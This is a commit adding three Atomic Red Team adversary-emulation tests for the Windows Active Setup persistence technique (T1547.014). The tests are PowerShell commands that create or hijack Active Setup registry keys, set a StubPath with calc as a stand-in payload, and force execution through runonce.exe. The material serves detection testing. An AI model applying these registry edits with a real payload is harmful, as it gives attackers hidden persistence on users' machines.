Added missing test for T1547.014 Active Setup, 3 tests created (#2219)

* Added missing test for T1547.014 Active Setup, 3 tests created

 Committer: Thomas De Brelaz <thockoro@hotmail.com>

* some format changes and simplications

* Update T1547.014.yaml

Co-authored-by: Thomas De Brelaz <thomas.de-brelaz@ubisoft.com>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>

atomics/T1547.014/T1547.014.yaml

@@ -0,0 +1,64 @@
+attack_technique: T1547.014
+display_name: 'Active Setup'
+atomic_tests:
+- name: 'HKLM - Add atomic_test key to launch executable as part of user setup'
+  description: |
+    This test will create an "atomic_test" key under 'HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components' to launch calc by configuring an active setup executable and 
+    forcing to run active setup using the "runonce.exe /AlternateShellStartup" command. 
+    Without the "runonce.exe /AlternateShellStartup" command it would run during the next logon for each user.
+    
+    Note: If you logout before running the cleanup command, you will be required to go through the OOBE (out-of-box experience) setup sequence to log back in. 
+    The payload will only run once unless the cleanup command is run in between tests.
+  
+    [Active Setup Explained](https://helgeklein.com/blog/active-setup-explained/)
+  supported_platforms:
+  - windows
+  input_arguments:
+    payload:
+      description: Payload to run once during login
+      type: String
+      default: C:\Windows\System32\calc.exe
+  executor:
+    command: |-
+      New-Item "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components" -Name "atomic_test" -Force
+      Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" "(Default)" "ART TEST" -Force
+      Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" "StubPath" "#{payload}" -Force 
+      & $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
+    cleanup_command: |-
+      Remove-Item "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" -Force -ErrorAction Ignore
+      Remove-Item "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" -Force -ErrorAction Ignore
+    name: powershell
+    elevation_required: true
+- name: 'HKLM - Add malicious StubPath value to existing Active Setup Entry'
+  description: |
+    This test will add a StubPath entry to the Active Setup native registry key associated with 'Internet Explorer Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600}) 
+    Said key doesn't have a StubPath value by default, by adding one it will launch calc by forcing to run active setup using runonce.exe /AlternateShellStartup. 
+    Without the last command it will normally run on next user logon. Note: this test will only run once successfully if no cleanup command is run in between test.
+  supported_platforms:
+  - windows
+  input_arguments:
+    payload:
+      description: Payload to run once during login
+      type: String
+      default: C:\Windows\System32\calc.exe
+  executor:
+    command: |-
+      Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" "StubPath" "#{payload}" -Force
+      & $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
+    cleanup_command: |-
+      Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "StubPath" -Force
+      Remove-ItemProperty "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "Version" -Force
+    name: powershell
+    elevation_required: true
+- name: HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number
+  description: |
+    This test will decrease the version number of the 'Internet Explorer Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600}) registry key for the current user, 
+    which will force the StubPath payload (if set) to execute.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "Version" -Value "0,0,0,0"
+      & $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
+    name: powershell
+    elevation_required: true